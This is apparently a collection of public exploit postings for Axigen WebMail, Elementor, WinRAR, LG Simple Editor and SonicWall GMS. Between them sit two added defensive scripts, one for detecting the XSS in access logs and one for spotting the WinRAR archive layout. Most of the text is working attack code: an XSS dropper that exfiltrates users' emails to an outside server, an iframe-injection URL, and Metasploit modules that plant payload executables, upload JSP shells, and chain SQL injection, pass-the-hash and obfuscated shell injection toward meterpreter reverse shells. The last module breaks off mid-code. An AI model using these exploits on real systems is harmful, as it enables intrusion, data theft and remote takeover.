<pre><code># Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS<br /># Google Dork: inurl:passwordexpired=yes<br /># Date: 2023-08-21<br /># Exploit Author: AmirZargham<br /># Vendor Homepage: https://www.axigen.com/<br /># Software Link: https://www.axigen.com/mail-server/download/<br /># Version: (10.5.0–4370c946) and older versions of Axigen WebMail<br /># Tested on: firefox,chrome<br /># CVE: CVE-2022-31470<br /><br />Exploit<br />We use the second Reflected XSS to exploit this vulnerability, create a malicious link, and steal user emails.<br /><br />Dropper code<br />This dropper code loads and executes JavaScript exploit code from a remote server.<br /><br />');<br />x = document.createElement('script');<br />x.src = 'https://example.com/exploit.js';<br />window.addEventListener('DOMContentLoaded', function y() {<br />  document.body.appendChild(x)<br />})//<br /><br />Encoded form<br /><br />/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//<br /><br />Exploit code<br /><br />xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new XMLHttpRequest();<br />oob_server = 'https://example.com/';<br />var script_tag = document.createElement('script');<br /><br />xhr1.open('GET', '/', true);<br />xhr1.onreadystatechange = () => {<br />  if (xhr1.readyState === XMLHttpRequest.DONE) {<br />    _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];<br />    xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`, true);<br />    xhr2.setRequestHeader('Content-Type', 'application/json');<br />    xhr2.onreadystatechange = () => {<br />      if (xhr2.readyState === XMLHttpRequest.DONE) {<br />        if (xhr2.status === 401) {<br />          script_tag.src = `${oob_server}?status=session_expired&domain=${document.domain}`;<br />          document.body.appendChild(script_tag);<br />        } else {<br />          resp = xhr2.responseText;<br />          folderId = JSON.parse(resp)["mails"][0]["folderId"];<br />          xhr3.open('GET', `/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);<br />          xhr3.onreadystatechange = () => {<br />            if (xhr3.readyState === XMLHttpRequest.DONE) {<br />              emails = xhr3.responseText;<br />              script_tag.src = `${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;<br />              document.body.appendChild(script_tag);<br />            }<br />          };<br />          xhr3.send();<br />        }<br />      }<br />    };<br />    var body = JSON.stringify({isUnread: false});<br />    xhr2.send(body);<br />  }<br />};<br />xhr1.send();<br /><br />Combining dropper and exploit<br />You can host the exploit code somewhere and then address it in the dropper code.<br /></code></pre>
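A defender-side check added here, not part of the advisory above: it scans web-server access-log lines for requests to index.hsp whose m parameter, once URL-decoded (twice, to catch double encoding), has the break-out-of-a-string-then-run-script shape of the encoded form above. The parameter name is taken from that encoded URL, the combined log format is assumed, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Tokens a legitimate value of the reflected "m" parameter would not carry
# but the dropper above does (constructed list; extend it for your environment).
SCRIPT_MARKERS = (
    "document.createelement",
    "addeventlistener",
    "appendchild",
    "<script",
    ".src=",
    "eval(",
)

# Request field of a combined-format log line: "METHOD target HTTP/x.y" (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# The reflected context is a quoted JS string, so a payload has to close it
# with a quote or parenthesis before it can start statements of its own.
BREAKOUT_RE = re.compile(r"['\")]")


def suspicious_m_param(target: str) -> bool:
    """True if `target` is an index.hsp request whose m= value looks like injected script."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/index.hsp"):
        return False
    # parse_qs percent-decodes once; decode a second time so that a
    # double-encoded payload (%2527 -> %27 -> ') does not slip past the markers.
    for value in parse_qs(parts.query, keep_blank_values=True).get("m", []):
        decoded = unquote_plus(value).lower()
        if BREAKOUT_RE.search(decoded) and any(m in decoded for m in SCRIPT_MARKERS):
            return True
    return False


def scan_log(lines):
    """Return [(line_no, client_ip, request_target)] for every suspicious request."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and suspicious_m_param(match.group("target")):
            client_ip = line.split(" ", 1)[0]
            hits.append((line_no, client_ip, match.group("target")))
    return hits


# Constructed access-log lines: a normal visit, the encoded dropper URL from
# the advisory, a benign m= value, and an unrelated API call.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Aug/2023:10:14:02 +0000] "GET /index.hsp?passwordexpired=yes HTTP/1.1" 200 5120',
    '203.0.113.5 - - [21/Aug/2023:10:14:09 +0000] "GET /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})// HTTP/1.1" 200 4096',
    '198.51.100.7 - - [21/Aug/2023:10:15:30 +0000] "GET /index.hsp?m=3 HTTP/1.1" 200 3000',
    '198.51.100.9 - - [21/Aug/2023:10:16:01 +0000] "PATCH /api/v1/conversations/MQ/?_h=abc HTTP/1.1" 200 210',
]

if __name__ == "__main__":
    for line_no, client_ip, target in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {client_ip} -> {target[:80]}...")
```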
<pre><code># Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection<br /># Date: 28.08.2023<br /># Exploit Author: Miguel Santareno<br /># Vendor Homepage: https://elementor.com/<br /># Version: < 3.5.5<br /># Tested on: Google and Firefox latest version<br /># CVE : CVE-2022-4953<br /><br /># 1. Description<br />The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.<br /><br /><br /># 2. Proof of Concept (PoC)<br />Proof of Concept:<br />https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'zip'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::FILEFORMAT<br />  include Msf::Exploit::EXE<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'WinRAR CVE-2023-38831 Exploit',<br />        'Description' => %q{<br />          This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its<br />          embedded document, the decoy document is executed, leading to code execution.<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => ['Alexander "xaitax" Hagenah'],<br />        'References' => [<br />          ['CVE', '2023-38831'],<br />          ['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'],<br />          ['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/']<br />        ],<br />        'Platform' => ['win'],<br />        'Arch' => [ ARCH_X64, ARCH_X86 ],<br />        'Targets' => [['Windows', {}]],<br />        'Payload' => {<br />          'DisableNops' => true<br />        },<br />        'DisclosureDate' => '2023-08-23',<br />        'DefaultTarget' => 0,<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br />        }<br />      )<br />    )<br /><br />    register_options([<br />      OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),<br />      OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])<br />    ])<br /><br />    register_advanced_options([<br />      OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload executable.', nil])<br />    ])<br />  end<br /><br />  def exploit<br />    Dir.mktmpdir do |temp_dir|<br />      output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE'])<br />      input_file = datastore['INPUT_FILE']<br />      decoy_name = File.basename(input_file)<br />      decoy_ext = ".#{File.extname(input_file)[1..]}"<br />      payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) + '.exe'<br /><br />      decoy_dir = File.join(temp_dir, "#{decoy_name}A")<br />      Dir.mkdir(decoy_dir)<br /><br />      payload_path = File.join(decoy_dir, payload_name)<br />      File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }<br /><br />      bat_script = <<~BAT<br />        @echo off<br />        start "" "%~dp0#{payload_name}"<br />        start "" "%~dp0#{decoy_name}"<br />      BAT<br /><br />      bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd")<br />      File.write(bat_path, bat_script)<br /><br />      FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B"))<br /><br />      zip_path = File.join(temp_dir, 'template.zip')<br />      Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|<br />        zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))<br />        zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)<br />        zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)<br />      end<br /><br />      content = File.binread(zip_path)<br />      content.gsub!(decoy_ext + 'A', decoy_ext + ' ')<br />      content.gsub!(decoy_ext + 'B', decoy_ext + ' ')<br /><br />      File.binwrite(output_rar, content)<br /><br />      print_good("Created #{output_rar}")<br />    end<br />  end<br />end<br /></code></pre>
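A defender-side check added here, not part of the module above: it opens a ZIP container and reports every file entry whose name also serves as a directory prefix holding an executable, which is the layout the module writes (a decoy "name.ext " beside "name.ext /name.ext .cmd" and the payload). It generalizes slightly by reporting the pair with or without the trailing space. The sample archives are constructed in the code with inert placeholder contents; the extension list is an assumption.

```python
import io
import zipfile

# Extensions the shell would execute when the entry inside the look-alike
# directory is opened (assumed list; extend as needed).
EXEC_EXTS = (".cmd", ".bat", ".exe", ".com", ".scr", ".ps1", ".vbs", ".js")


def find_38831_pairs(archive_bytes: bytes):
    """Return [(decoy_entry, [executable entries])] for each CVE-2023-38831-style pair.

    A normal archive never has a file entry "X" and, at the same time, entries
    under a directory named exactly "X/": that is the confusion the module
    above relies on, with X ending in a space so it looks like the decoy.
    """
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        names = zf.namelist()
    findings = []
    for decoy in names:
        if decoy.endswith("/"):
            continue  # explicit directory entry, not a file
        prefix = decoy + "/"
        inside = [n for n in names if n.startswith(prefix) and n != prefix]
        # rstrip(): the .cmd name itself carries the trailing space before ".cmd"
        executables = [n for n in inside if n.lower().rstrip().endswith(EXEC_EXTS)]
        if executables:
            findings.append((decoy, executables))
    return findings


def build_sample_archive() -> bytes:
    """Constructed ZIP with the layout the module writes; contents are inert placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf ", b"%PDF-1.4 placeholder")
        zf.writestr("report.pdf /report.pdf .cmd", "rem placeholder\r\n")
        zf.writestr("report.pdf /aBcDeFgH.exe", b"MZ placeholder")
    return buf.getvalue()


def build_benign_archive() -> bytes:
    """Constructed ZIP with ordinary entries: no file name doubles as a directory name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4 placeholder")
        zf.writestr("tools/helper.cmd", "rem placeholder\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for decoy, execs in find_38831_pairs(build_sample_archive()):
        print(f"suspicious: {decoy!r} shadows a directory containing {execs}")
```

WinRAR opens the module's output as a ZIP despite the .rar name, so the same check applies to files carrying either extension.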
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper # includes register_files_for_cleanup<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'LG Simple Editor Remote Code Execution',<br /> 'Description' => %q{<br /> This Metasploit module exploits broken access control and directory traversal<br /> vulnerabilities in LG Simple Editor software for gaining code execution.<br /> The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.<br /> By exploiting this flaw, an attacker can upload and execute a malicious JSP<br /> payload with the SYSTEM user permissions.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'rgod', # Vulnerability discovery<br /> 'Ege Balcı <egebalci@pm.me>' # msf module<br /> ],<br /> 'References' => [<br /> ['ZDI', '23-1204'],<br /> ['CVE', '2023-40498']<br /> ],<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 5<br /> },<br /> 'Platform' => %w[win],<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> ['LG Simple Editor <= v3.21', {}]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-08-24',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri, 
'simpleeditor', 'common', 'commonReleaseNotes.do')<br /> }<br /> )<br /><br /> return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /><br /> version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))<br /> return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'<br /> return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')<br /><br /> Exploit::CheckCode::Safe<br /> end<br /><br /> def generate_jsp_payload<br /> exe = generate_payload_exe<br /> base64_exe = Rex::Text.encode_base64(exe)<br /> payload_name = rand_text_alpha(rand(3..8))<br /><br /> var_raw = 'a' + rand_text_alpha(rand(3..10))<br /> var_ostream = 'b' + rand_text_alpha(rand(3..10))<br /> var_buf = 'c' + rand_text_alpha(rand(3..10))<br /> var_decoder = 'd' + rand_text_alpha(rand(3..10))<br /> var_tmp = 'e' + rand_text_alpha(rand(3..10))<br /> var_path = 'f' + rand_text_alpha(rand(3..10))<br /> var_proc2 = 'e' + rand_text_alpha(rand(3..10))<br /><br /> jsp = %|<br /> <%@page import="java.io.*" %><br /> <%@page import="sun.misc.BASE64Decoder"%><br /> <%<br /> try {<br /> String #{var_buf} = "#{base64_exe}";<br /> BASE64Decoder #{var_decoder} = new BASE64Decoder();<br /> byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());<br /><br /> File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");<br /> String #{var_path} = #{var_tmp}.getAbsolutePath();<br /><br /> BufferedOutputStream #{var_ostream} =<br /> new BufferedOutputStream(new FileOutputStream(#{var_path}));<br /> #{var_ostream}.write(#{var_raw});<br /> #{var_ostream}.close();<br /> Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});<br /> } catch (Exception e) {<br /> }<br /> %><br /> |<br /><br /> jsp.gsub!(/[\n\t\r]/, '')<br /><br /> jsp<br /> end<br /><br /> def copy_file(src, dst)<br /> data = {<br /> command: 'cp',<br /> option: '-f',<br /> srcPath: src,<br /> 
destPath: dst<br /> }<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'fileSystem',<br /> 'makeDetailContent.do'),<br /> 'headers' => {<br /> 'X-Requested-With' => 'XMLHttpRequest',<br /> 'Accept' => 'application/json'<br /> },<br /> 'ctype' => 'application/json',<br /> 'data' => data.to_json<br /> }<br /> )<br /> if res && res.code == 200 && res.body.to_s.include?('errorMessage":"success",')<br /> print_good "#{src} -> #{dst} copy successful."<br /> else<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Could not copy the payload.")<br /> end<br /> end<br /><br /> def exploit<br /> rand_name = Rex::Text.rand_text_alpha(5)<br /> form = Rex::MIME::Message.new<br /> form.add_part(<br /> generate_jsp_payload,<br /> 'image/bmp',<br /> 'binary',<br /> "form-data; name=\"uploadFile\"; filename=\"#{rand_name}.bmp\""<br /> )<br /> form.add_part('/', nil, nil, 'form-data; name="uploadPath"')<br /> form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_x"')<br /> form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_y"')<br /> form.add_part('1920', nil, nil, 'form-data; name="uploadFile_width"')<br /> form.add_part('1080', nil, nil, 'form-data; name="uploadFile_height"')<br /><br /> print_status 'Uploading JSP payload...'<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadImage.do'),<br /> 'ctype' => "multipart/form-data; boundary=#{form.bound}",<br /> 'data' => form.to_s<br /> }<br /> )<br /> if res && res.code == 200<br /> print_good 'Payload uploaded successfully'<br /> else<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Payload upload failed")<br /> end<br /><br /> # Now we copy our payload as JSP<br /> copy_file("/#{rand_name}_original.bmp", "/#{rand_name}.jsp")<br /> register_files_for_cleanup("./webapps/simpleeditor/#{rand_name}.jsp")<br /><br /> print_status 'Triggering 
payload...'<br /> send_request_cgi(<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'simpleeditor', "#{rand_name}.jsp")<br /> }<br /> )<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html<br /><br /> # We can actually use the title to identify which platform we're on<br /> TITLE_WINDOWS = 'SonicWall Universal Management Host'<br /> TITLE_LINUX = 'SonicWall Universal Management Appliance'<br /><br /> # Secret key (from com.sonicwall.ws.servlet.auth.MSWAuthenticator)<br /> SECRET_KEY = '?~!@#$%^^()'<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Sonicwall',<br /> 'Description' => %q{<br /> This module exploits a series of vulnerabilities - including auth<br /> bypass, SQL injection, and shell injection - to obtain remote code<br /> execution on SonicWall GMS versions <= 9.9.9320.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'fulmetalpackets <fulmetalpackets@gmail.com>', # MSF module, analysis<br /> 'Ron Bowes <rbowes@rapid7.com>' # MSF module, original PoC, analysis<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/'],<br /> [ 'CVE', '2023-34124'],<br /> [ 'CVE', '2023-34133'],<br /> [ 'CVE', '2023-34132'],<br /> [ 'CVE', '2023-34127']<br /> ],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_X64],<br /> 'Type' => :dropper,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',<br /> 'WritableDir' => '/tmp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 
'Platform' => ['win'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Type' => :cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',<br /> 'WritableDir' => '%TEMP%'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Command',<br /> {<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Type' => :cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/generic'<br /> }<br /> }<br /> ],<br /> ],<br /> 'DefaultTarget' => 0,<br /><br /> 'DisclosureDate' => '2023-07-12',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> },<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => '443'<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [ true, 'The root URI of the Sonicwall appliance', '/']),<br /> ]<br /> )<br /><br /> register_advanced_options([<br /> # This varies by target, so don't define the default here<br /> OptString.new('WritableDir', [true, 'A directory where we can write files']),<br /> ])<br /> end<br /><br /> def check<br /> vprint_status("Validating SonicWall GMS is running on URI: #{target_uri.path}")<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'GET'<br /> )<br /><br /> # Basic sanity checks - the path should return a HTTP/200<br /> return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?<br /> return CheckCode::Unknown("Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200<br /><br /> # Ensure we're hitting plausible software<br /> return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite [^<]+)</<br /><br /> # Otherwise, probably safe?<br /> CheckCode::Safe('Does not appear to be running SonicWall GMS')<br /> end<br /><br /> # Exploits CVE-2023-34133 (SQL injection) + CVE-2023-34124 
(auth bypass) to<br /> # get a password hash<br /> def get_password_hash<br /> # attempt a sqli.<br /> vprint_status('Attempting to use SQL injection to grab the password hash for the superadmin user...')<br /><br /> # SQL injection question to fetch the admin password<br /> query = "' union select " +<br /><br /> # This must be a valid DOMAIN, which we can thankfully fetch from the DB<br /> '(select ID from SGMSDB.DOMAINS limit 1), ' +<br /><br /> # These fields don't matter<br /> "'', '', '', '', '', " +<br /><br /> # This field is returned, so use it to get the id and password for our<br /> # the super user, if possible<br /> "(select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0)," +<br /><br /> # The rest of the fields don't matter, end with a single quote to finish with a clean query<br /> "'', '', '"<br /> vprint_status("Generated SQL injection: #{query}")<br /><br /> # We need to sign our query with the SECRET_KEY<br /> token = Base64.strict_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.const_get('SHA1').new, SECRET_KEY, query))<br /> vprint_status("Generated a token using built-in secret key: #{token}")<br /><br /> # Build the URI<br /> # Note that encoding space to '+' doesn't work, so we replace it with '%20'<br /> uri = normalize_uri(target_uri.path, 'ws/msw/tenant', CGI.escape(query).gsub(/\+/, '%20'))<br /><br /> # Do it!<br /> print_status('Sending SQL injection request to get the username/hash...')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => uri,<br /> 'headers' => {<br /> 'Auth' => '{"user": "system", "hash": "' + token + '"}'<br /> }<br /> )<br /><br /> # Sanity checks<br /> fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200<br /> fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if 
res.get_json_document.empty?<br /><br /> # This field has the SQL injection response<br /> hash = res.get_json_document['alias']<br /><br /> # If the server responds with an error, it has no 'alias' field so the key<br /> # is missing entirely (this is where it fails against patched targets)<br /> fail_with(Failure::NotVulnerable, "SQL injection failed - service probably isn't vulnerable (or isn't configured)") if hash.nil?<br /><br /> # If alias is present but contains nothing, that means our query got no<br /> # results (probably there are no active users, or something?)<br /> fail_with(Failure::UnexpectedReply, 'SQL injection appeared to work, but no users returned - server might not have an admin account?') if hash.empty?<br /><br /> # If there's no ':' in the response, something super weird happened<br /> fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')<br /><br /> username, hash = hash.split(/:/, 2)<br /> print_good("Found an account: #{username}:#{hash}")<br /><br /> [username, hash]<br /> end<br /><br /> # Exploits CVE-2023-34132 (pass the hash)<br /> def authenticate(username, hash)<br /> # Grab server hashing token<br /> vprint_status('Grabbing server hashing token...')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/appliance/login'),<br /> 'keep_cookies' => true<br /> )<br /> fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?<br /><br /> # Look for the getPwdHash function call, as it contains the token we need<br /> if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil?<br /> fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication')<br /> end<br /><br /> server_token = ::Regexp.last_match(1)<br /> vprint_status("Got the server-side token: #{server_token}")<br /><br /> # Generate the client_hash by combining the server token + the stolen<br /> # password 
hash<br /> client_hash = Digest::MD5.hexdigest(server_token + hash)<br /> vprint_status("Generated client token: #{client_hash}")<br /><br /> # Send the token<br /> print_status('Attempting to authenticate with the client token + password hash...')<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'action' => 'login',<br /> 'clientHash' => client_hash,<br /> 'applianceUser' => username<br /> }<br /> })<br /><br /> fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?<br /><br /> # Check the title to make sure it worked<br /> html = res.get_html_document<br /> title = html.at('title').text<br /><br /> # We can identify the platform based on the title<br /> if title == TITLE_LINUX<br /> print_good("Successfully logged in as #{username} (Linux detected!)")<br /> return Msf::Module::Platform::Linux<br /> elsif title == TITLE_WINDOWS<br /> print_good("Successfully logged in as #{username} (Windows detected!)")<br /> return Msf::Module::Platform::Windows<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, "Authentication appears to have failed! Title was \"#{title}\", which is not recognized as successful")<br /> end<br /><br /> def execute_command_windows(cmd)<br /> vprint_status("Encoding (Windows) command: #{cmd}")<br /><br /> # While this is a shell command injection issue, an aggressive XSS filter<br /> # prevents us from using a lot of important characters such as quotes and<br /> # plus and ampersands and stuff. 
We can't even use Base64, because we can't<br /> # use the + sign!<br /> #<br /> # We discovered that we could encode the command as integers, then use<br /> # powershell to decode + execute it, so that's what this does.<br /> cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"<br /> encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"<br /><br /> # Run the command<br /> vprint_status("Running shell command: #{cmd}")<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'action' => 'file_system',<br /> 'task' => 'search',<br /> 'searchFolder' => 'C:\\GMSVP\\etc\\',<br /> 'searchFilter' => "|#{encoded_cmd}| rem "<br /> }<br /> })<br /><br /> # This doesn't work, because our payload blocks and it eventually fails<br /> fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?<br /> fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')<br /><br /> print_good('Payload sent!')<br /> end<br /><br /> def execute_command_linux(cmd)<br /> vprint_status('Encoding (Linux) payload')<br /><br /> # Generate a filename<br /> payload_file = File.join(datastore['WritableDir'], ".#{Rex::Text.rand_text_alpha_lower(8)}")<br /><br /> # Wrap the command so we can execute arbitrary commands. There are several<br /> # difficulties here, the first of which is that we don't have much in the<br /> # way of tools. We're missing curl, wget, base64, python, ruby, even perl!<br /> # The best tool I could find for staging a payload is uudecode, so we use<br /> # that. 
(I noticed later that telnet exists, which could be another option)<br /> #<br /> # The good news is, with uudecode, we can send a base64 payload. The bad<br /> # news is, we can't use '+', which means we can't use pure base64! To work<br /> # around that, we replace '+' with '@', then use a bit of Bash magic to<br /> # put it back! We also can't use quotes, so we have to do a mountain of<br /> # escaping instead. The default shell is also /bin/sh, so we need to run<br /> # bash explicitly for the `$()` substitutions to work.<br /> cmd = [<br /> # Build a command that runs in bash (but don't use quotes!)<br /> 'bash -c ',<br /><br /> # Escape all this for bash<br /> Shellwords.escape([<br /> # Use `uudecode` to get a '+' into a variable<br /> "PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);",<br /><br /> # Build a new uuencode file (encoded in base64) with the payload<br /> "echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n",<br /><br /> # Encode the payload as base64, but replace + with a variable<br /> "#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n",<br /><br /> # Pipe into uudecode<br /> '==== | uudecode;',<br /><br /> # Run in the background with coproc<br /> "coproc #{Shellwords.escape(payload_file)};",<br /><br /> # Delete the payload file<br /> "rm #{payload_file}"<br /> ].join)<br /> ].join<br /><br /> # Run it!<br /> vprint_status("Encoded shell command: #{cmd}")<br /> print_status('Attempting to execute the shell injection payload')<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'action' => 'file_system',<br /> 'task' => 'search',<br /> 'searchFolder' => '/opt/GMSVP/etc/',<br /> 'searchFilter' => ";#{cmd}#"<br /> 